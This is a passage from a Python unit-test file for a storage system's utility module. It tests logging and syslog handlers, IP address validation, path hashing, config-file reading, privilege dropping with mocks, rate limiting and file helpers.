'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('errno.ECONNREFUSED message test' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test txn in info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warning('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warning('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_is_valid_ip(self):
self.assertTrue(is_valid_ip("127.0.0.1"))
self.assertTrue(is_valid_ip("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "::1"
self.assertTrue(is_valid_ip(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ip(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ip(not_ipv6))
def test_is_valid_ipv4(self):
self.assertTrue(is_valid_ipv4("127.0.0.1"))
self.assertTrue(is_valid_ipv4("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "::1"
self.assertFalse(is_valid_ipv4(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ipv4(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ipv4(not_ipv6))
def test_is_valid_ipv6(self):
self.assertFalse(is_valid_ipv6("127.0.0.1"))
self.assertFalse(is_valid_ipv6("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "::1"
self.assertTrue(is_valid_ipv6(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ipv6(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ipv6(not_ipv6))
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
# if we have the section and either of prefix or suffix,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
# definitely, we have the section and both of them,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
# But invalid section name should make an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
# make sure it's accurate to 10th of a second, converting the time
# difference to milliseconds, 100 milliseconds is 1/10 of a second
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
